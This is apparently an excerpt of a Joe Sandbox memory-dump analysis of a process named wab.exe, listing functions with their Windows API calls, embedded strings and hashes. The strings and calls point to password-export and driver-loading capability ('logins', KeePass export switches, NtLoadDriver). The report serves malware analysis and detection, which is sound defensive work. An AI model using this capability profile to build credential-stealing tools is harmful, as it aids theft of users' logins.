                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                  • API String ID: 4054529287-3175352466
                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                  Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$_snwprintfmemset$wcscpy
                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                  • API String ID: 3143752011-1996832678
                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                  Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                  • API String ID: 667068680-2887671607
                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                  Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfmemset$wcscpy$wcscat
                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                  • API String ID: 1607361635-601624466
                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                  Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf$memset$wcscpy
                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                  • API String ID: 2000436516-3842416460
                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                  Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                  • String ID:
                  • API String ID: 1043902810-0
                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                  Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@_snwprintfwcscpy
                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                  • API String ID: 2899246560-1542517562
                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                  Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040DBCD
                  • memset.MSVCRT ref: 0040DBE9
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                  • wcscpy.MSVCRT ref: 0040DC2D
                  • wcscpy.MSVCRT ref: 0040DC3C
                  • wcscpy.MSVCRT ref: 0040DC4C
                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                  • wcscpy.MSVCRT ref: 0040DCC3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                  • API String ID: 3330709923-517860148
                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                  Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                  • memset.MSVCRT ref: 0040806A
                  • memset.MSVCRT ref: 0040807F
                  • _wtoi.MSVCRT ref: 004081AF
                  • _wcsicmp.MSVCRT ref: 004081C3
                  • memset.MSVCRT ref: 004081E4
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                  • String ID: logins$null
                  • API String ID: 3492182834-2163367763
                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                  Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  • memset.MSVCRT ref: 004085CF
                  • memset.MSVCRT ref: 004085F1
                  • memset.MSVCRT ref: 00408606
                  • strcmp.MSVCRT ref: 00408645
                  • _mbscpy.MSVCRT ref: 004086DB
                  • _mbscpy.MSVCRT ref: 004086FA
                  • memset.MSVCRT ref: 0040870E
                  • strcmp.MSVCRT ref: 0040876B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                  • String ID: ---
                  • API String ID: 3437578500-2854292027
                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                  Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0041087D
                  • memset.MSVCRT ref: 00410892
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                  • GetSysColor.USER32(0000000F), ref: 00410999
                  • DeleteObject.GDI32(?), ref: 004109D0
                  • DeleteObject.GDI32(?), ref: 004109D6
                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                  • String ID:
                  • API String ID: 1010922700-0
                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                  Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                  • malloc.MSVCRT ref: 004186B7
                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                  • malloc.MSVCRT ref: 004186FE
                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$FullNamePath$malloc$Version
                  • String ID: |A
                  • API String ID: 4233704886-1717621600
                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                  Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp
                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                  • API String ID: 2081463915-1959339147
                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                  Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                  • API String ID: 2012295524-70141382
                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                  Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                  • API String ID: 667068680-3953557276
                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                  Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetDC.USER32(00000000), ref: 004121FF
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                  • SelectObject.GDI32(?,?), ref: 00412251
                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                  • SetCursor.USER32(00000000), ref: 004122BC
                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                  • memcpy.MSVCRT ref: 0041234D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                  • String ID:
                  • API String ID: 1700100422-0
                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                  Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?,?), ref: 004111E0
                  • GetWindowRect.USER32(?,?), ref: 004111F6
                  • GetWindowRect.USER32(?,?), ref: 0041120C
                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                  • GetWindowRect.USER32(00000000), ref: 0041124D
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Defer$Rect$BeginClientItemPoints
